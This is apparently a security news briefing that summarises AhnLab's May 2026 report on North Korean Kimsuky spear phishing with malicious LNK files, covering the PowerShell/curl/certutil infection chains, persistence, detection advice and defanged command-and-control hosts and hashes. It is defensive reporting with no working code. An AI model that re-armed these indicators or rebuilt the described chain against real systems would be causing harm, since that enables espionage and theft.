AhnLab's May 2026 monthly report on advanced persistent threat (APT) activity in South Korea paints a familiar picture: almost every targeted attack the security firm caught last month began with a spear phishing email (a lure crafted for a specific person) carrying a malicious Windows shortcut, or LNK, file. Open it, and a chain of hidden scripts quietly installs backdoors and information stealers, handing North Korea linked operators remote control of the victim's computer.
AhnLab's ASEC team reports that LNK based attacks made up the single largest share of the intrusions it tracked, with booby-trapped CHM help files a distant second. The tradecraft and indicators line up with Kimsuky, the prolific North Korean espionage group AhnLab tags in the report, which has spent years phishing South Korean government, academic, and defense targets.
How the attack works
The lures arrive disguised as resumes, invoices, or routine work documents. The LNK file hides PowerShell or CMD commands that reach out to attacker controlled servers, often abusing legitimate platforms such as Google Drive and GitHub to stage later payloads, then download additional malware and register a Windows Task Scheduler job so the infection survives a reboot. AhnLab cataloged at least eight distinct chains. Some drop AutoIt based malware, others load XenoRAT (a remote access trojan), and several use DLL side loading to slip a backdoor into a trusted Windows process where security tools are less likely to spot it. One cluster leans on curl.exe and certutil.exe, both built into Windows, to fetch and decode payloads, a living off the land approach that leaves fewer obvious traces.
The pattern echoes earlier Kimsuky operations we have covered, including an LNK to PowerShell espionage chain built for credential theft and keylogging against South Korean government targets.
What you should do
AhnLab urges users to verify senders before opening attachments, avoid files from unknown sources, keep operating systems and browsers fully patched, and treat unexpected LNK, CHM, and HTA files as hostile. Because these chains rely on legitimate Windows utilities, defenders should watch for unusual child processes spawned by the Task Scheduler and for curl, certutil, regsvr32, or mshta reaching out to the internet.
Indicators of compromise
Selected defanged indicators from AhnLab's report: staging and command and control hosts hxxp://newtech[.]dkcreatech[.]com:57877/, hxxps://aplore[.]kesug[.]com/riln[.]php, update[.]nstlog[.]store, and univercity[.]library[.]boxathome[.]net; sample hashes (MD5) 076a8a0ae0c7d6270070b297c8617e2e and 0896485da9a470d504fbaad570b16358.
Full technical detail and the complete indicator set are in AhnLab's original report.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.